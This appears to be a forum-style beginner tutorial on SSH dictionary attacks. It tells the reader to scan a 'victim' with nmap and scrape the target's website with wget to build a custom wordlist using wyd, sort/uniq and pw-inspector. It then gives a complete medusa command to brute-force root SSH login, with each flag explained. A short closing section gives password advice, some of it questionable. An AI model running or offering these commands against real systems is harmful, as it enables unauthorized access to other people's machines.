Today I will be talking about dictionary attacks. Dictionary attacks are a way to crack passwords. It uses long list of passwords to try and get into a system. I will NOT be talking about web forum attacks which is pretty much the master level of dictionary attacks. Let's start with the basics.
I will be talking about crackong SSH. SSH is probaly the best, and easiest way to dictionary attack your victim in my opinion. Most of the time their username for ssh is "root" so you don't have to worry about mutliple usernames to test. To begin, let's nmap our victim.
Nmap is a giant program full of millions of combinations and extras that I can certainly not cover during this mini tutorial. So let's just use a simple nmap command:
nmap -p 22 -PN -v -sT (victims IP address here)
Heres a screenie:
This will list the open ports of the victim. This way we can figure out if our victim has SSH.
Wait a few seconds for it to gather information and then pay attention for "port 22" being open. If port 22 is open then you know you can dictionary attack your victim.
You will now need a wordlist. A wordlist is a list of possible passwords. Basically wordlist attacks keep trying every word on a wordlist until they succeed or run out of words. So you can either use the wordlists from the repo or enjoy making a custom one. I am going to show you how to make a custom one without using harvester. This way you get to see what each step is doing (and plus it's more fun.) Usually you will want to make a custom wordlist if your victim seems to be interested in a specific type of genre of activities.
For example a while back a friend of mine wanted to see if I could get into his website. The website was like a wiki type thing for the universe, so I imgained his password would be related to space. And I bruteforced the login with my custom wordlist and it WORKED. Here's how:
You will need wget, wyd, and hydra for this.
Make a folder for all your targets.
wget -r (the website)
Here it a yellow brick road to the folder:
go into VAR
go into MOBILE
Go into the targets folder you made:
Now after you have downloaded the website let's use wyd to seperate the words.
Now run this:
./wyd.pl -n -o /var/mobile/number1.txt /var/mobile/victims
Here's a screenie:
This will seperate all the words downloaded into a file. Now we must properly configure it.
cat number1.txt | sort | uniq > number2.txt
Here's a picuture of the number 2 file that I made:
This will configure the spacing and elimate the fautilty words.
Now let's run pw-inspector on it!
cat number2.txt | pw-inspector -m 1 -M 20 > pass.txt
Here's a picture of the pass.txt file:
There you go! A list of possible passwords custom made. Now let's start the attack!
medusa -h (victim's ip) -M ssh -u root -P /var/mobile/pass.txt -n 22
Here's a screenie of medusa dictionary attacking!
I use medusa but you can use hydra if you want. Now let me explain, in depth, everything you i listed above. You can get medusa from:
ininjas.com/repo from cydia or for linux:http://www.darknet.org.uk/2007/11/medusa-14-parallel-password-cracker-released-for-download/
(-h) is the victim's ip address. Nothing special.
-M is the module name. This basically tells medusa what to bruteforce.
-u is the username
-P is the directory to the wordlist file.
-n is the port (22 for ssh)
Thats all you need to know to run yourfirst bruteforce with medusa! Later I will cover parrell attacks and more advacned things!
P.S. This tutorial is meant for noobs to medusa so many of you pros may consider it "bad" because you were not taught anything and most of it could of been replaced by Harvester. The most important part of not raising skiddies is making them not use automations for things. Also, if there are any recommendations for me please leave them in the comment section below. And by the way, pictures are a no go because I am having trouble uploading.
How to avoid getting your password bruteforced or dictionary attacked:
Basically having a strong password on all your password required terms. If you are hosting a website explore your website for open ports that link to protocols i.e. telnet, ssh Or maybe hire a white hat hacker to perform his attacks against your website. A secure password consists of NUMBERS and letters and, at least one crazy sign. Also a simple word that has no numbers, but is a random word that no one will guess is NOT a secure password. There are wordlists out there that have EVERY word in the english language and other languages aswell. Also common passwords are also bad i.e. alex123 or money$ These may seem like "good" passwords because they have numbers, but are not. If you are paranoid about passwords try a password generator. Just pray that your password generator account doesn't get hacked. Finally, don't use password generator apps, like ones found in cydia. The reason behind that is, people could UDID fake with your UDID and get ALL your passwords. You could use programs like listed in the comment section or you could just have a secure password.